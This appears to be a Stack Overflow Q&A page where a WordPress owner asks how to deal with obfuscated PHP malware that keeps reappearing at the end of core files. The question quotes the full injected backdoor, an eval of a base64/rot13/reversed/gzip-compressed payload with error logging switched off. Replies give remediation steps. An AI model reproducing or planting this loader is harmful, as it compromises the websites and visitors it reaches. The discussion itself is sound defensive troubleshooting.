-1

I have a problem with Wordpress. Someone infected my wordpress catalogue. Core, theme and plugins are up to date. In files xmlrpc.php, wp-trackback.php, wp-signup.php etc (all php files) on the end of file I have below code added: When I deleted this code from files, it appears again on the next few days :(

<?php $dAglL = 'b'.'ase64'.'_d'.'ecode'; $lufhp = 'st'.'r'.'_ro'.'t13'; $waAFR = 's'.'t'.'rrev'; $QIGep = 'g'.'zuncompre'.'ss'; error_reporting(0); ini_set('error_log', NULL); eval($QIGep($waAFR($lufhp($dAglL('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'))))); ?>
Krystian
  • 47
  • 7
  • Shared hosting? – itachi Jan 09 '23 at 15:12
  • 1
    If they can get in once, they can get in twice (and they likely left back-doors in various places). Restore to a backup, update your server's packages (and make sure you're on a supported, 8.x version of PHP), update your WordPress installation and any plugins, etc. Read https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server, too. – ceejayoz Jan 09 '23 at 15:14
  • check directory permissions, also for folders containing uploads add a htaccess that disables php for those folders – john Smith Jan 09 '23 at 15:20

1 Answers1

1

Do you have any idea what elements could have caused this security issue? Because you need to find the source of the problem, if not, no matter what you do, it might happen again.

However, here is what I suggest to you:

  1. Backup all your website current data, files, database, etc.
  2. You can completely reinstall all core files like wp-admin, wp-includes etc. The best solution will to reinstall a fresh WordPress, then import your backupped database and readd also your files in "wp-content"
  3. Check your "uploads" directory, maybe the "hacker" installed a malicious file
  4. Check your "wp_users" table to see if there is any unknown user, and also change your admin password
  5. DON'T USE any cracked plugin, theme etc. maybe it is not your case, but I prefer to highlight it, because it is very important
  6. You can also install this plugin to see what happens on your website, you will not see everything, but it can helps in some cases: https://wordpress.org/plugins/stream/
Ah Hu
  • 46
  • 7